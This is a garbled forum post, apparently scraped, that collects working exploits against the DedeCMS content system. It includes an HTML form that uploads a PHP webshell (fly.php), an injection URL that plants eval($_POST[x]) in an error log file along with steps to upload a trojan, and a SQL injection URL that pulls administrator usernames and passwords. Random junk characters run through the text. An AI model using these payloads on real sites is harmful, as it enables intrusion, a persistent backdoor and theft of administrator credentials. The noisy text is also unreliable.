<input type='hidden' name='cfg_mediatype' value='php' />
0 X+ w6 _; Y" ~) S4 {1 i! e5 r. }<input type='hidden' name='f' value='form1.enclosure' />! B& o* t+ k+ D6 s1 M; x' U
<input type='hidden' name='job' value='upload' />
, o* H4 _! Y( d9 S: J4 k8 K<input type='hidden' name='newname' value='fly.php' />) S# |- @& r$ S7 _- Y) z* `
Select U Shell <input type='file' name='uploadfile' size='25' />
, U+ J1 T! H( D  j* X<input type='submit' name='sb1' value='确定' />% j& [, a' w  k7 n) Y3 ^
</form>
) i- H( `3 N. a& Z<br />It's just a exp for the bug of Dedecms V55...<br />
. B2 i# v6 \. c6 r; R( J) YNeed register_globals = on...<br />3 o" r; u4 U$ r, g/ k6 N9 j
Fun the game,get a webshell at /data/cache/fly.php...<br />
6 g' h5 `) R, o* H</body>1 X* Y1 p  k, ?5 d1 `
</html>
) w- N  s* M+ a2 i6 Y) m8 C, `, U; M6 N
& q- m0 B1 ]' G* c& k# @
" H% d2 F( i. l

; c* z9 W, C1 T
+ g1 V# s' v" J: L$ A" k. a
+ `5 M8 z# _* |: U$ |& b4 t4 V( P4 Z

# L: `5 M! v3 M1 R# p3 N* \
! L" R. @& e2 i1 Q2 [
+ o5 i. b- I8 @- I7 Q3 z织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞$ Y" `- ~* M& I
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。/ f& b7 N: Y' N: R; `" G, V
1. 访问网址：/ n& e8 I# Z2 D4 p( Q- K% c
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
' i( L% J7 j3 F: @/ P; D可看见错误信息# T4 ^4 s, }) b6 u/ |. u/ j
  |. X: m5 w9 D
3 Q2 `" I4 r( b- Q4 n
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。/ r, `) d' H9 ]5 `- _, Z
int(3) Error: Illegal double '1024e1024' value found during parsing
6 t$ K1 l; R4 a3 i# R: ]% E- yError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>  g! G5 h* L: x9 Y1 P$ l

/ E' W9 A( [! {9 V
  \, g1 m0 S( S( B( U! E% U3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是  V7 w6 l! C3 @3 T- _1 S; z
/ F/ W( H- u+ e5 Y
+ x( q! @! N( U% T  P
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
4 Q  e1 ~! P& v5 k& \" Q2 Q4 I& i2 A) e) I' J+ V9 Z5 q% [

7 k# N; I$ E1 S0 @9 Z6 M( r按确定后的看到第2步骤的信息表示文件木马上传成功.% F! e" S, z7 e; R
1 l" R% a/ I; v7 M5 |: `

& i5 k4 Z2 ~3 Z$ Q0 b9 e& @2 a: x; O
4 L7 z$ N& K! ?+ T+ Q  @# K1 |3 }6 a* l
6 m+ X& e: U8 d0 A

$ q6 ^2 P8 I! G. o
+ m( g9 E% P/ j6 Z) U; d$ O0 n* n1 m0 B: ~0 m3 P

: R" ^. {5 E0 l
7 m/ q. P, \8 X* x
, i. h4 @: O6 U0 P7 L) B: S: P, p+ P" H5 ^4 D
织梦(DedeCms)plus/infosearch.php 文件注入漏洞: `( x( k/ W7 s8 }
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册